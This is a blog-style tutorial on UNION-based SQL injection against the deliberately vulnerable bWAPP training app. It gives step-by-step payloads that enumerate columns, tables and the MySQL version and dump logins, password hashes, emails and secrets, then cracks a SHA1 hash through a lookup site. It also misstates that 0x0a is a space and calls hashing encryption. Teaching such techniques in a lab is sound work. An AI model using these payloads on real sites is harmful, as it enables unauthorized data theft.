In this tutorial i’ll show you how sql injection works and how to use it to extract information from the database.
The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of columns of other tables.
For this tutorial we’ll use bWAPP vulnerable application.
Start the bee-box and verify the IP address (open the terminal and type “ifconfig”), in my case 192.168.1.10. Now open your browser and connect to bee-box address. Login in and choose SQL Injection (GET/Search)
CHECK IF IT IS VULNERABLE
To check if the search form is vulnerable, we have to found an existing film, i found hulk
Now we type: hulk’, how you can see we get an error, that means it is vulnerable
DETERMINE THE NUMBER OF COLUMNS
To determine the number of columns, we use ORDER BY n+1. We increment the number until we get an error.
When we type hulk’ order by 8# we get an error, so we know that the number of columns is 7
FIND THE VULNERABLE COLUMNS
To find the vulnerable columns we use UNION SELECT command. So we type hulk’ union select 1,2,3,4,5,6,7# and we will see some numbers appear on the page: 2, 3, 5, 4. These are the vulnerable columns
CHECKING THE MYSQL VERSION
To check the MySql version, we use @@version command. We replace one vulnerable column number with the our command: hulk’ union select 1,@@version,3,4,5,6,7#, we get 5.0.96-0ubuntu3
GET THE TABLES
To get the tables insert this: hulk’ union select 1,group_concat(table_name),3,4,5,6,7 from
information_schema.tables where table_schema=database()#. We get 5 tables: blog, heroes, movies, users, visitors
GET THE COLUMNS
An interesting table is users. We extract the columns from this table:
hulk’ union select 1,group_concat(column_name, 0x0a),3,4,5,6,7 from information_schema.columns where table_name=”users”# (0x0a is a space in hexadecimal)
EXTRACT THE DATA
Finally we can extract the data: login, password, email, secret.
hulk’ union select 1,login,password,email,secret,6,7 from users#
For better display we insert each data in a different column
How you can see the password is encrypted (sha1). We can decrypt it here: hashtoolkit.
The password is: bug.
Obviously there are tools that do this automatically, like sqlmap. This is an example to understand how these tools work.